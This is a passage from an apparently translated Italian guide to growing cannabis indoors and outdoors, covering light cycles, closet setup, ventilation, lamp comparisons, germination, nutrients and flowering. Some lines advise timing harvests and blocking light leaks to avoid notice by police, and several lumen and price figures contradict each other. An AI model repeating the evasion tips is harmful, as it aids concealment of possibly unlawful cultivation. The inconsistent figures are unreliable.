più velocemente in questa fase con una continua fotosintesi (luce costante).
Una volta che la pianta è alta 30-50 centimetri, tempo permettendo, può essere forzata a
cominciare la fioritura portandola fuori nel periodo primaverile o autunnale. (Per la
fioritura estiva all'aperto, la notte deve essere artificialmente allungata nella serra
per "forzare" le piante a fiorire. Vedi il capitolo 'Fioritura'.)
Portando le piante a periodi di 10-13 ore di luce (spostandole all'aperto) con oscurità
ininterrotta (nessuna sorgente di luce intensa nelle vicinanze) le si forzerà a fiorire.
Matureranno e saranno alte 50-100 cm quando saranno pronte per il raccolto. Quando una
pianta viene spostata da una sorgente di luce continua al coperto ad un periodo di 10-13
ore al giorno fuori, comincerà a fiorire prevedendo un'incombente inverno. I processi
vegetativi spostati all'aperto il 1° marzo, saranno giunti a maturazione il 1° maggio. I
processi vegetativi spostati all'aperto il 1° maggio, saranno giunti a maturazione
il 1° luglio. I processi vegetativi spostati all'aperto il 1° settembre, saranno belli
pronti per il 1° novembre. In Inverno queste operazioni vengono compiute all'interno e una
pianta viene piantata per semenza in previsione di piantare all'aperto l'estate successiva,
o soltanto per avere un po' di roba extra da parte per l'inverno.
Tieni presente che lo sbirro va in cerca delle piante nel periodo tra settembre e novembre,
e non può in alcun modo notare in aprile piante sistemate all'aperto che fioriscono. Sii
furbo, fatti il tuo gran raccolto in maggio, non in ottobre!


COLTIVARE DENTRO

Si dovrebbe trovare un piccolo spazio al coperto in modo da servirsene per germinare i semi.
Questi processi vegetativi iniziali vengono poi portati all'aperto per maturare in primavera,
dopo la fine delle ultime gelate.
Lo spazio può essere uno sgabuzzino, una zona della camera da letto, un'area della cantina,
una soffitta o un bagno non usato. Alcune persone dedicano l'intera camere da letto alla
coltivazione.
Lo spazio non dovrebbe avere fessure che lasciano filtrare la luce, in modo tale che nessuna
luce sospetta possa essere vista dall'esterno. Ciò potrebbe attirare pulotti o ladruncoli.
Lo spazio dovrebbe essere ventilato. Lasciando aperta la porta di uno sgabuzzino potrebbe
esserci ventilazione a sufficienza se lo spazio non è illuminato da forti luci che generano
molto calore.
Separare l'aria viziata in uscita e quella buona in entrata è la cosa migliore. Una presa
d'aria in cima alla stanza per eliminare l'aria pesante verso la soffitta o fuori dal tetto,
ed una per portare dentro aria dall'esterno o da una grata sotto il pavimento. Serviti di
ventole di raffreddamento di vecchi computer, disponibili da rivenditori di elettronica per
5 dollari americani. Interruttori a reostato possono essere usati per regolare la velocità o
il rumore dei ventilatori. Usa silicone per assicurare i ventilatori a tubi in PVC di 10-15
centimetri infilati in buchi tondi aperti nel pavimento e sul soffitto. Usa molto silicone
per attutire le vibrazioni dei ventilatori, in modo che i muri non entrino in risonanza con
le oscillazioni delle ventole.
Rivesti i muri con fogli di alluminio, il lato opaco all'esterno per diffondere la luce e
prevenire i punti caldi, oppure dipingi i muri di bianco riflettente per meglio propagare
la luce. Pannelli calorizzati, dello spessore di 0,02 millimetri sono la cosa più
indicata. (20 dollari per 7,5 metri di 1/4 di un rotolo esteso.) Gli specchi non sono
molto indicati, visto che il vetro assorbe la luce!
Rivesti il pavimento con fogli plastificati in caso di spargimenti d'acqua, ecc...
Installa una presa di interruzione della tensione (salvavita) ed assicurati che il
cablaggio elettrico regoli le lampade secondo le tue esigenze d'uso. Usa sempre regolatori
di corrente per lampade HID su mensole, e anche per quelle che si trovano sopra il livello
del pavimento, in caso di spargimenti d'acqua. Mettendo prolunghe sul pavimento sotto i
regolatori di corrente, andrà bene lo stesso.
Una mensola sopra la principale area di coltivazione può essere usata per clonare i tagli e
germogliare le pianticelle. Permetterà inoltre di raddoppiare l'area di coltura e sarà un
inapprezzabile spazio di deposito per i nutrimenti della pianta, bombolette spray ed altro
materiale da giardinaggio. Questa area si mantiene molto calda, così non ci sarà bisogno di
alcun sistema di riscaldamento per la fase della germinazione, permettendoti di risparmiare
parecchi soldi.
Appendi una tenda che non fa passare la luce per separare questa mensola dall'area
principale quando la stai usando per la fioritura. Questo ti permetterà di fornire luce
costante alla mensola e periodi di buio nell'area principale dedicata alla coltivazione.
Del velcro può essere utilizzato per tenere le tende unite al loro posto e dei lacci per
avvolgerle quando controlli l'area di coltivazione. Vinile nero con sostegni bianchi
funziona meglio.
Ora hai bisogno delle luci. Un paio di luci da negozio andranno benissimo se vuoi iniziare
soltanto con piante all'interno per poi trasferirle fuori per crescerle in una piccola
serra. Possono essere acquistate con lampadine per circa 10 dollari ciascuna, o senza
lampadine per circa 8. Cerca di trovarle in svendita. Usa un tipo di lampadina a luce
chiara (bianco freddo) ed una a luce calda per ottenere il più ampio spettro di luce
possibile per la crescita della pianta. Non usare tipi di lampadine specifici per la
coltura, perché come non emettono molta luce, così pure non servono a nulla nella maggior
parte dei casi.
Se sei riuscito a trovare soltanto una luce chiara, o è tutto ciò che puoi permetterti,
usala. Funziona benissimo ed è di gran lunga la più conveniente (circa 1-2 dollari l'una).


UNA MENSOLA CHE CRESCE

Il trattamento della mensola con illuminazione a fluorescenza può essere la strada del
futuro, dal momento che il materiale è così poco costoso e facile da reperire. Le lampade
fluorescenti sono l'ideale per la cura della mensola. Con questo sistema possono essere
installate molte mensole, una sopra l'altra, e lampade fluorescenti per ciascuna mensola.
Alcune mensole avranno 24 ore di illuminazione, altre soltanto 12 ore (per la fioritura).
Due aree vanno meglio, magari con un'altra dedicata alla clonazione e alla germinazione dei
semi.
Il trattamento della mensola presume il tuo impegno nel mantenere tutte le piante sui
90 cm o meno alla maturazione, in modo da lasciare tutte le mensole separate da 90-120
cm. Non è necessaria molta luce, quando hai piante che sono così piccole e forzate a
maturare in fretta.
Uno svantaggio per una coltivazione su mensole di questo tipo è dato dal fatto che si
impiega proprio molto tempo a regolare l'altezza della lampada ogni giorno, ed è molto
difficile riuscire a prendere un periodo di ferie per anche una sola settimana senza
curarsi del piccolo giardino. Questo è rivolto in particolar modo allo stadio vegetativo,
quando le piante crescono molto anche di 2-3 cm al giorno. Le lampade sulle mensole in
fase di fioritura non vengono regolate così spesso.
Normalmente, le lampade dovrebbero essere tenute 5 cm sopra le piante, con le piante
sistemate in modo tale che diventino progressivamente più alte mano a mano che la lampada
viene portata in alto, e tutte le piante rimangano costantemente alla distanza di 5 cm.
Questa è comunque una soluzione, e se vai in vacanza, regola le lampade in modo da essere
sicuro che le piante non potranno crescere fino alle lampade in questo lasso di tempo.
Se lampade abbastanza fluorescenti sono usate per illuminare completamente la mensola, la
disponibilità di spazio non creerà piante lunghe ed esili. Cresceranno soltanto un po' più
lentamente se le lampade non sono proprio vicine a loro.
Un'alternativa è usare lampade fluorescenti per la clonazione, la germinazione e la
crescita della piccola pianticella nella parte alta di uno stanzino, quindi passare ad una
lampada HPS per una crescita vegetativa o fioritura accelerata nell'area principale dello
sgabuzzino.
Posiziona l'HPS in modo tale che non avrà bisogno di ulteriori sistemazioni, sul punto più
elevato dello sgabuzzino o della stanza. La maggior parte delle installazioni di HPS non
richiederanno regolazioni dell'altezza della lampada. Fissa soltanto la lampada alla parte
inferiore della mensola o sul soffitto più in alto che puoi, e se vuoi mettere alcune piante
più vicine alla lampada, sistemale su una mensola provvisoria, uno scatolone o un tavolo.
Una mensola è tutto ciò di cui hai bisogno per questo tipo di trattamento, preferibilmente
larga almeno 50 cm, fino a un massimo di 60. Questa area deve essere verniciata con colore
bianco riflettente, o coperta con una lamina di alluminio, con il lato opaco all'esterno per
riflettere la luce alle piante. (Il Iato opaco all'esterno previene i punti caldi, cioè le
sovraesposizioni di luce in particolari zone circoscritte, in più diffonde meglio la luce.)
Dipingi anche la mensola di bianco. Oppure utilizza pannelli calorizzari (lett: aluminised
mylar), un telo in materiale riflettente o qualche materiale con la superficie argentea. Non
usare specchi, visto che il vetro assorbe la luce.
Appendi lampade da negozio a catene e assicurati di poterle regolare con ganci o con altri
generi di meccanismi in modo che possano essere tenute il più possibile vicino alle piante
in ogni momento. Se le lampade sono troppo lontane dalle piante, le piante potrebbero
crescere lunghe, con gambi stretti e storti nel tentativo di raggiungere la lampada, e non
produrranno molte gemme a maturazione avvenuta. Questo è dovuto essenzialmente alla distanza
molto più alta tra gli internodi, cioè la lunghezza del gambo tra ogni gruppo di foglie. Se
è più corta, ci possono essere più internodi, così più rami, così una pianta che produce
più gemme in meno spazio in tempo di raccolto.
La cura della mensola è di tanto in tanto trattata nel capitolo 'Un mare di verde', perché
molte piante crescono insieme al chiuso, creando un baldacchino verde di cime che crescono
e maturano rapidamente, mentre il raccolto successivo comincia e continua a crescere in
un'area separata a luce continua. I cloni vanno sviluppati su una mensola a luce continua,
fino a quando attecchiscono ed entrano nella fase di crescita vegetativa, quindi vanno
posti su una mensola con 12 ore di luce al giorno per la fioritura.


ILLUMINAZIONE

All'interno, circa 20000 lumen per metro quadro è il quantitativo minimo per cominciare la
coltivazione. Se ti tieni sotto questo livello, la crescita della pianta non sarà certamente
tanto rapida quanto nelle sue possibilità, e la lunghezza internodo-fusto aumenterà. Inoltre,
anche la distanza della luce dalle piante sarà molto più critica. Regolazioni quotidiane
delle lampade saranno così necessarie, e ciò significa che tu non andrai in vacanza.
25000 lumen/mq dovrebbe essere un buon valore, 30000 è ottimale se ti presti ad integrare o
arricchire il livello di CO2 (ne parleremo in seguito).
Le lampade a luminescenza ad alta intensità (HID: High Intensity Discharge) sono la
soluzione migliore per la maggior parte dei coltivatori al coperto. Le lampade HID si
dividono in 3 categorie di base: Sodio ad Alta Pressione (HPS: High Pressure Sodium),
Alogenuro di Metallo (MH: Metal Halide) e Vapore di Mercurio (MV: Mercury Vapor). L'Alogenuro
di Metallo ha uno spettro più ampio, il Vapore del Mercurio è progettato per una intensità
più elevata. Il Sodio ad Alta Pressione è una sorta di luce giallastra, forse un pizzico
rosa o arancione. La stessa di alcuni lampioni stradali.
Le lampade HPS possono essere usate per coltivare un raccolto dall'inizio alla fine. Test
dimostrano che il raccolto con HPS matura una settimana dopo rispetto ad un pari raccolto
sotto MH, ma è un raccolto più abbondante, così è meglio attendere la settimana aggiuntiva.
Le HID più facili da reperire, e le meno costose inizialmente sono le lampade a fluorescenza
e al vapore di mercurio. Le MV garantiscono circa 7500 lumen per 175 watt, e i 150 watt delle
HPS generano circa 14000 lumen, così le HPS sono quasi il doppio più efficienti. Ma lo
spettro del colore prodotto dalle MV non è poi tanto buono. Le HPS hanno elevati valori del
rosso, che è particolarmente indicato per la fioritura, mentre le MH sono prestanti nei
valori del blu, richiesto per una migliore crescita vegetativa. Sfortunatamente, le lampade
MV forniscono lo spettro meno indicato per la crescita della pianta, ma sono veramente
economiche. Non sono consigliabili, a meno che tu non riesca a recuperarle gratuitamente, e
in più, il rapporto elettricità/efficienza ripaga l'investimento iniziale.
Una HPS da 400 watt emetterà intorno ai 4 mila lumen. Per ogni 500 watt di uso continuo,
spendi circa 20 dollari americani al mese in elettricità, così è evidente che con una
lampada che consuma la metà per produrre gli stessi lumen (o il doppio dei lumen a parità
di potenza) pagherai lo stesso in un anno o giù di lì, e da allora in poi, verranno raccolti
continui risparmi. Questo è un semplice costo iniziale a confronto con un calcolo delle spese
di gestione, e non prende in considerazione una crescita più rapida e l'aumento della
produzione che le lampade HPS ti assicurano, dovuto alla quantità di luce disponibile. Se
questo è fattorizzato nel calcolo le lampade HPS ti ripagheranno già dal primo raccolto,
paragonate alle lampade MV o a fluorescenza, dal momento che raggiungono facilmente il
doppio in quanto ad efficienza e fanno crescere i fiori più velocemente e con dimensioni
maggiori.

Tipo di lampada Watt Lumen per lampadina Efficienza totale

Lampada a fluorescenza 40 2800 400 watt = 2800 lumen
Vapore di mercurio 175 7500 400 watt = 18500 lumen
Alogenuro di metallo 400 33500 400 watt = 33500 lumen
Sodio ad alta pressione 400 42000 400 watt = 42000 lumen

Nota che le lampade a vapore di mercurio sono meno efficienti di quelle a fluorescenza (FL),
e non possono essere posizionate vicino alle piante, così le piante non potranno usare buona
parte della luce delle MV. La distribuzione della luce non è buona in entrambi i casi. Le
lampade MV semplicemente non sono indicate per la coltura al coperto. Usa esclusivamente
lampade fluorescenti, MH o HPS. Le lampade alogene ad arco generano molto calore e non molta
luce per il wattaggio che usano, e non sono raccomandate, pur se lo spettro di luce è
appropriato per una crescita decente.
C'è un nuovo tipo di lampada HPS chiamata Son Agro, ed è disponibile da 250, 400 e 1000 watt.
Quella a 400 è in realtà a 430 watt; sono stati aggiunti 30 watt di blu a questa
lampadina. E' una lampada molto luminosa (50 mila lumen) ed è pensata per un uso nelle serre.
Queste lampadine possono essere acquistate per sostituire le normali lampadine HPS, così
possono essere una eventualità se già possiedi una lampada HPS. La cosa bella di questa
lampadina è che non si rinuncia alla maggior parte dei vantaggi delle lampade MH, come la
minima distanza tra gli internodi e una maturazione precoce, come può confermare la maggior
parte degli utilizzatori delle HPS, e si hanno tutti i vantaggi delle lampade HPS. Un'unica
lampadina che fa tutto.
La lunghezza internodale delle piante cresciute con la Son Agro è la più corta che si sia
mai vista con qualsiasi tipo di lampada. Le piante cresciute sotto questa lampada sono
incredibilmente folte, compatte e si sviluppano molto in fretta. Le lampadine Son Agro
comunque, non durano tanto a lungo quanto una normale lampadina HPS. C'è una differenza di
circa il 25% in meno nella vita della lampadina.
La lampada all'alogenuro di metallo (MH) è un'altra alternativa, ed è disponibile in
lampadine sia da 33500 che da 37000 lumen per 400 watt. La super lampadina (Super Bulb -
37000 lumen) costa circa 10-15 dollari, e garantisce un extra di 3500 lumen. Credo che la
Super Bulb possa durare più a lungo; in tal caso, è la soluzione da prendere. La luce
dell'alogenuro è più blu e migliore della HPS per la crescita vegetativa, ma complessivamente
è molto meno efficiente della HPS. E' possibile acquistare delle lampadine di conversione per
una lampada MH che la converte a HPS, ma il costo della lampadina-convertitore è maggiore
della lampadina Son Agro con la correzione del colore, così è raccomandabile acquistare
soltanto una Son Agro HPS. Anche se costa di più inizialmente, risparmierai energia e soldi
dopo, ed è molto più facile da appendere rispetto a 10 tubi fluorescenti.
Se possiedi una lampada MH da 33500 lumen che gira a 400 watt ed una HPS da 5 mila lumen
che gira a 430 watt, qual'è la più indicata? Quale garantirà un miglior raccolto?
Naturalmente, la Son Agro HPS, anche se il costo iniziale è più elevato. A dire il vero,
il regolatore di corrente aggiungerà un buon 10% in più al wattaggio complessivo.
La lampadina Son Agro si rivelerà di gran lunga migliore della MH per ogni utilizzo. La MH
non dura molto a lungo, ma è più conveniente. Confronta i 36 dollari per una lampadina MH da
400 watt contro i 40 dollari per una HPS. Aggiungi 15 dollari per la Son Agro HPS. La HPS ha
una durata media superiore di due volte. 21 mila ore contro 10 mila. La Son Agro è di 16 mila
o giù di lì. Ancora, più la vita della lampadina è lunga e più luce aggiungi, risparmiando
denaro per l'energia.
Sistemare orizzontalmente una HID è una buona idea, visto che aumenterà del 30% la quantità
di luce che normalmente giunge alle piante. La maggior parte delle HID vendute per l'uso in
giardini al coperto in questo periodo sono sistemate in questa posizione orizzontale.
La HPS ha un funzionamento molto meno costoso di qualsiasi altro tipo di lampada, ma viene
venduta a 70 watt nei negozi di articoli per la casa. Questa taglia non è molto indicata,
ma surclassa la FL in efficienza, così potrebbe essere una valida alternativa alla FL per
progetti su piccola scala, tipo 1 metro quadro o meno. Oltre il metro quadro, hai bisogno
di più luce di quanta una di queste lampade può apportare, ma potresti usare due di queste.
Le lampade HPS da 70 watt costano 40 dollari ciascuna, complete. Due lampade sarebbero 140
watt che irraggiano 11000 lumen, che è un risultato migliore di quello delle FL, ma una HPS
da 150 watt diffonde 16500 lumen, la vita della lampadina è più lunga, le lampadine sono più
convenienti e la lampada opera con maggiore efficienza. Il problema più grosso è che le
lampade di media potenza come le HPS da 150 e 250 watt costano quasi come la più grande da
400. Per questa ragione se hai spazio per la lampada più grande, compra quella da 400. Se sei
d'accordo, un modello da 1080 watt è altresì disponibile, ma potresti trovare una migliore
diffusione della luce con due da 400 piuttosto che una lampada grande. Naturalmente le due
lampade più piccole sono più costose da acquistare che una lampada grande, così la maggior
parte delle persone sceglie la lampada più grande per operazioni più grandi.
Produrre calore nella stanza è una caratteristica delle lampade HID, e quanta luce le piante
possono assimilare è determinata dalla temperatura, dal livello di CO2, dalla disponibilità
di nutrimento, dal pH, e da altri fattori. Una lampada troppo grande per un spazio richiederà
una necessaria ventilazione costante, ed allora non c'è altra soluzione che arricchire la CO2,
dal momento che ne risente immediatamente.
Costo della lampadina: il costo della lampadina HPS da 70 watt è di 24 dollari, da 150 è solo
di 30, e da 400 è solo di 40. In questo modo spenderai di più a sostituire due HPS da 70 watt
che una da 400 watt. Aggiungi anche che il più basso valore per rivendere il modello da 70
watt è praticamente nullo per il fatto che sono usate e non soddisfano più questa domanda, e
risulta evidente che 189 dollari per una HOP da 250 o 219 dollari per una da 400, può essere
che valga il prezzo. Tieni a mente che per 30 in più, puoi avere la lampada più grande (400
watt) e irradiare oltre 1850 lumen di luce in più della lampada più piccola. Niente male!
Qui di seguito c'è un'analisi dei prezzi:

Tipo di lampada Costo complessivo Costo lampadina Vita lampadina Lumen

HPS 400 219 dollari USA 40 dollari USA 18000 ore 4650 0
MH 400 175 dollari USA 37 dollari USA 10000 ore 33500
Son Agro 400 235 dollari USA 55 dollari USA 15000 ore 49000
Super MH 400 190 dollari USA 45 dollari USA ? 37000
MH 250 149 dollari USA 32 dollari USA ? 19500
HPS 250 165 dollari USA 36 dollari USA ? 25000
HPS agro 250 180 dollari USA 53 dollari USA ? 28000
MH 150 139 dollari USA 25 dollari USA ? 13000
HPS 175 150 dollari USA 30 dollari USA ? 15500

Se stai cercando uno questi tipi di lampade, guarda sulle Pagine Gialle alla voce
giardinaggio, serre ed illuminazione per giardini al coperto nella tua zona.
Qui in Italia, ho potuto notare che le lampadine HPS e MH a bulbo più convenienti sono
le philips:
Philips HPS son-t 250W (per superfici di circa ½ mq -> fase di fioritura);
Philips HPS son-t 400W (per superfici di circa 1 mq -> fase di fioritura);
Philips MH hqt 250W (per superfici di circa ½ mq -> fase di crescita vegetativa);
Philips MH hqt 400W (per superfici di circa 1 mq -> fase di crescita vegetativa);

e le osram [n.d.t.].


MARE DI VERDE

Il 'Mare di Verde' (SOG: Sea of Green) è la teoria della raccolta di una parte di piccole
pianticelle, portate alla maturazione in breve tempo per ottenere la più rapida produzione
di gemme a disposizione. Invece di crescere solo poche piante per un periodo più lungo di
tempo, nello stesso spazio si fanno crescere molte piante più piccole che maturano velocemente
ed in meno tempo. Così, è richiesto un tempo minore tra i raccolti. Questo sarà importante
per te quando ti arriveranno a casa ogni mese le bollette della luce. Si può iniziare un
raccolto mentre l'altro matura, ottenendo così una produzione a ciclo continuo, che può
essere mantenuta per tutto il corso dell'anno. 30-40 piante per metro quadro (4 piante per
piede quadrato) dovrebbero essere un buon inizio. 10 piante per metro quadro ti garantiranno
spazio in abbondanza tra ogni pianta per sviluppare le parti superiori, ma non garantiranno
molte diramazioni più in basso. Questo va bene per l'interno, dove i rami bassi sono sempre

  

in qualche modo ombreggiati, e non cresceranno molto bene a meno che tu non provveda a
fornire più luce e spazio. Il coltivatore al coperto capisce al volo che le piante troppo
alte non crescono abbastanza nelle parti basse così da rendere inutile il tempo extra dedicato
alla coltivazione. Questa è un'eccezione alla regola se si vuole portare ad un certo punto
le piante all'aperto, e si ritiene che il rapporto luce/ombra non sia un fattore determinante.
Le piante, se sono state seminate allo stesso tempo, dovrebbero formare quello che viene
chiamato un "baldacchino verde" che trattiene la maggior parte della luce nelle zone alte
delle piante. Una luce fioca filtra sotto questo livello, visto che le piante sono così
vicine tra loro. Il giardiniere si presta a concentrarla sulla cima della pianta, e usa la
luce e lo spazio per meglio avvantaggiarsi nel minor tempo possibile. L'uso di recinzioni
di nylon o sostegni simili sistemati sul baldacchino verde sosterrà le piante quando
iniziano a piegarsi sotto il peso delle voluminose estremità fiorite. Possono essere usati
anche dei paletti, ma non è facile inserirli per le piante in mezzo e in fondo allo spazio,
dove è più difficile arrivarci.
Volere grandi piante è scontato, dal momento che producono di più per pianta, ma di solito
è meglio, con uno spazio limitato, coltivare piante più piccole che maturano più in fretta
e stanno in spazi ridotti. Il 'Mare di Verde' è stato sviluppato in Olanda. Invece di
stipare 4 piante grandi in uno spazio angusto, si mettono 12 più piccole su una mensola
sopra a 12 altre pianticelle. Queste piante abbisognano solo di 3-4 mesi per maturare dalla
germinazione alle gemme mature, e il raccolto può aver luogo in continuazione.


GERMINAZIONE

Fai crescere i semi in terreno povero (se decidi di piantare all'aperto) o in ambiente
idroponico a base di lana di roccia o di vermiculite. Non usare uno scatolone riempito per
piantare i semi. Prove non ufficiali e l'esperienza dimostrano che questi "cubi di torba"
non servono a nulla ma anzi arrestano lo sviluppo della pianta. Piantare nella vermiculite
dà alla pianticella così tanto ossigeno, ed è così facile per le radici svilupparsi, che le
piante si rivelano già grandi una settimana dopo la germinazione!
Tienile all'umido per tutto il tempo, piantando i semi in tazze da 500 grammi con buchi sul
fondo riempite con vermiculite, sistemate in una bacinella di soluzione nutriente diluita
oppure concentrata in contenitori in lana di roccia funzionerà altrettanto bene. Quando il
seme germoglia, sistema i cubi in lana di roccia in altri contenitori in lana di roccia più
grandi. Non ripiantarli in vaso o trapiantarli altrove, e non metterli insieme alla terra!
Puoi coltivare i semi in una carta assorbente. Questo metodo è complicato; è facile
compromettere le radici se vengono asciugate, o piantate troppo tardi dopo la germinazione.
La carta assorbente asciuga veramente in fretta! Metti la carta assorbente in una vaschetta,
riempita con soluzione nutriente diluita (non troppo!), e coprila con un involucro di
plastica per impedire che evapori. Metti la vaschetta in un posto al caldo; sopra una stufa
a gas, un termosifone, o sopra lampade calde. Coprila con carta nera per impedire alla luce
di entrare. Controllala ogni 12 ore e pianta i semi germinati, allo spuntare delle cime (se
possibile) in un ambiente naturale indicato per la crescita tanto presto quanto lo spuntare
delle radici dal seme sia di 2 millimetri o più. Serviti di pinzette, e non toccare le punte
delle radici. Trapianta i semi il meno possibile lasciandoli germinare nello stesso
contenitore in cui decidi di coltivare la pianta per un periodo significativo di tempo.
Pianta esclusivamente in vermiculite o in lana di roccia. Sarai stupito dai risultati! Il
90% della germinazione si basa su questo metodo, confrontato al 50% o meno degli scatoloni
(lett: Jiffy Cubes). (Il tuo profitto può variare.)
Il nutrimento per piante 5-55-17 come il Peter's Professional incentiverà lo sviluppo delle
radici del seme che germina e delle giovani piantine. Usa una soluzione molto diluita, in
acqua distillata, circa 1/3 della concentrazione normale, e mantieni la temperature tra i
22 e i 25 gradi. Un clima caldo è di fondamentale importanza. Secondo l'esperienza di molti
coltivatori si ha un basso indice di germinazione se la temperatura non è compresa tra questi
valori. Un termostato impostato su valori bassi o medi può rivelarsi indispensabile, oppure
una mensola continuamente riscaldata da una luce, ma prova con pochi semi, prima di dedicare
i raccolti degli anni a venire a quel sistema. Nessuna luce è indispensabile visto che può
rallentare la germinazione. Copri i semi che germinano con carta nera per impedire alla luce
di entrare. Metti le pianticelle alla luce una volta che sono germogliate.
Proponiti di trapiantare solo una volta o due prima del raccolto. Serviti del più grande
contenitore a tua disposizione per lo spazio e il numero di pianticelle che intendi coltivare.
Le piante soffrono se le trapianti continuamente e ritardano il raccolto. Soffrirai anche tu,
dall'eccessiva fatica! 13 bottiglie di plastica di Coca Cola da 2 litri riempite con
vermiculite/perlite staranno giuste in una vaschetta come, ad esempio, una lettiera per
gatti e non richiederanno trapianto per il primo raccolto, se intendi coltivare
idroponicamente.
Trapiantale per un secondo raccolto rigenerato.
Elimina i buchi sul fondo dei contenitori e riempi i pochi centimetri rimasti in cima al
contenitore solo di vermiculite, per piantare i semi o per consentire il trapianto delle
piantine.
Dal momento che la vermiculite trattiene molto bene l'acqua, ma non può trattenerne molta,
le radici hanno sempre molto ossigeno, anche se sono poste in una vaschetta piena d'acqua.
Il fertilizzante basato su perossido di idrogeno è usato per apportare ossigeno addizionale
alle piante quando i recipienti sono tenuti continuamente pieni (d'acqua). L'acqua può essere
lasciata diminuire ogni volta dopo l'innaffiamento, prima di aggiungere una nuova soluzione.
Questo permette alle radici delle piante di asciugarsi bene, e assicura un sufficiente
apporto di ossigeno.
Usa il prodotto SuperSoil quando metti la terra nel vaso, perché è eccellente e sterilizzato.
Se vuoi continuare a prendere terra dal cortile, sterilizzala in un forno a microonde o in
uno tradizionale fino a quando non si appanna il vetro. NON RACCOMANDATO: sterilizza i
contenitori con una soluzione a base di candeggina, specialmente se sono stati usati nella
stagione precedente per coltivare altro.



CRESCITA VEGETATIVA

Una volta germogliata, la pianta comincia la crescita vegetativa. Questo vuol dire che la
pianta inizierà il processo di fotosintesi per svilupparsi in altezza il più possibile e
formerà molte diramazioni (piccioli) per ogni coppia di foglie. Il picciolo (lett: grow tip)
è la parte che può essere clonata o riprodotta in forma asessuata. E' localizzato all'apice
della pianta e in ogni principale internodo. Se tagli l'apice della pianta, allora ottieni
due piccioli in cima. Se tagli ciascuno di questi, avrai 4 piccioli in cima alla pianta.
(Dal momento che ci vuole tempo perché la pianta riassorba e si riprenda dal trauma della
potatura, è più rapido crescere 4 piante più piccole senza tagliarle affatto. Oppure
coltivare 2 piante, e farle crescere in modo da riempire lo stesso spazio. La maggior
parte dei coltivatori lo prova.
Tutte le piante hanno uno stadio vegetativo in cui crescono il più rapidamente possibile
subito dopo la germinatura della pianta dal seme. E' possibile coltivare le piante senza
periodi di buio, ed aumentare la velocità con la quale crescono di un buon 15-30%. Le
piante possono essere riprodotte vegetativamente, cioè senza il concorso di organi
sessuali, indefinitamente. Sta al giardiniere decidere quando forzare la pianta a fiorire.
Una pianta può crescere da 30 cm a 3,5 m prima di essere forzata a fiorire, così ogni
giardiniere ha molta libertà per amministrarsi il proprio giardino in base agli obiettivi
che vuole conseguire e allo spazio disponibile.
Una soluzione di 20-20-20 con minerali in tracce è usata sia per le colture idroponiche che
per quelle in terra quando crescono in continuazione sotto luce. Il nutrimento per piante
Miracle Grow Patio o RapidGrow va bene per ciò. Un nutrimento ad alto contenuto di fosforo
(high P) come il Peter's 5-50-17 è utilizzato per far fiorire e fruttificare le piante quando
stanno per 12 ore al giorno. Sale inglese (1 cucchiaino da tè) dovrebbe essere usato nella
soluzione per l'apporto di magnesio e minerali a base di zolfo. Minerali in tracce sono
altrettanto indispensabili, se il tuo nutrimento non li include. Il Miracle Grow Patio
include questi elementi in tracce, ed è caldamente consigliato.
Mantieni un'illuminazione continua per i germogli, dal momento che non richiedono periodi di
buio come le piante più mature. Non avrai bisogno di un timer a meno che non voglia tenere
le lampade spente per un certo periodo al giorno. Cerca di illuminare le piante per 18 o più
ore, o in continuazione in questa fase.
Curva il fusto della pianticella avanti e indietro per spingerlo ad essere molto spesso e
robusto. Steli lunghi e sottili non possono sostenere una crescita pesante dei germogli. Un
ventilatore interno ridurrà l'umidità sugli stomi delle foglie e migliorerà anche la
robustezza del fusto. L'importanza della circolazione dell'aria interna non può essere mai
sottolineata a sufficienza. Rafforzerà le piante e le farà crescere più forti, mentre ridurrà
molte insidie che potrebbero mettere a rischio il tuo raccolto.

SOLUZIONE VEGETATIVA IDROPONICA, per gallone (circa 4 litri):

- Miracle Grow Patio (contiene elementi in tracce): 1 cucchiaino
- Sale inglese: 1/2 cucchiaino
- Urina umana (OPZIONALE- può provocare odori sgradevoli in ambienti chiusi.): 1/4 di tazza
- Nutrimento per piante arricchito con ossigeno (OPZIONALE):
1 cucchiaino

Questo cocktail assicurerà alle tue piante tutti i principali e secondari nutrimenti nella
soluzione, e in più tratterà le tue piante con ossigeno per una crescita ottimale delle
radici, e nitrato di potassio per una buona qualità di combustione. Un altro "ingrediente"
per una buona fase di sviluppo è 1/4 di cucchiaino di fertilizzante Peter's 20-20-20 per
gallone d'acqua, con elementi in tracce ed ossigeno aggiunto, o emulsioni di pesce. Le
emulsioni di pesce sono eccezionali in serre o all'aperto, dove gli odori non sono un
problema, ma non sono raccomandate per gli interni, a causa del loro fetore.




FIORITURA


La pianta sarà indotta a fruttificare o fiorire con cicli di buio di 11-13 ore che simulano
l'approssimarsi dell'inverno all'autunno con l'accorciarsi delle giornate. Di conseguenza,
va meglio all'aperto avere due aree separate; una usata per l'iniziale stato vegetativo ed
una per la fioritura e la fruttificazione. Non c'è nessuna altra necessità oltre a mantenere
cicli di buio, molto buio senza intermezzi di luce, altrimenti le piante possono ritardare la
fioritura di giorni o addirittura settimane.
Una volta che la pianta è abbastanza sviluppata per la maturazione (30 cm o più), periodi di
buio sono richiesti per la maggior parte delle piante per fiorire e produrre i frutti. Ciò
ti costringerà a mettere un timer alla lampada, per ricreare regolari e rigidi periodi di
buio e di luce ininterrotta. In serra lo stesso effetto può essere causato d'estate (giorni
lunghi) coprendola con una coperta per creare periodi di oscurità più lunghi. Un rigido
orario di copertura delle piante alle ore 20 e di scoperta alle 8 del mattino per 2
settimane spingerà le tue piante a fiorire. Dopo le prime 2 settimane l'orario può
essere più flessibile, ma sarà ancora necessario continuare questa routine per le
piante fino alla completa fioritura senza regredire allo stadio della crescita vegetativa.
All'aperto, in primavera e in autunno, le notti sono sufficientemente lunghe da spingerle a
fiorire di continuo. Porta semplicemente le piante dall'interno all'esterno in questo
periodo, e le piante fioriranno naturalmente. In estate inoltrata, con l'avvicinarsi
dell'autunno, può essere necessario solamente forzare la fioritura nelle prime due
settimane, quindi il rapido allungarsi della notte farà il resto.
Dai alle piante in fioritura nutrimenti ad alto contenuto di fosforo e mantienile in un
rigoroso regime di 12 ore di illuminazione, senza luce, o al massimo la luna piena durante
il ciclo di buio. 13 ore di luce, 11 di buio possono aumentare le dimensioni del fiore e
inoltre permettono alla pianta di entrare in fioritura. Serviti di periodi di buio più
lunghi per velocizzare la maturazione verso la fine del ciclo di fioritura (8-10 giorni).
Ciò comunque ridurrà il raccolto complessivo.
Si possono usare due mensole, una identica all'altra, se si desidera fare esclusivamente
del giardinaggio al coperto. Le luci di una mensola sono impiegate per 12-13 ore, e quelle
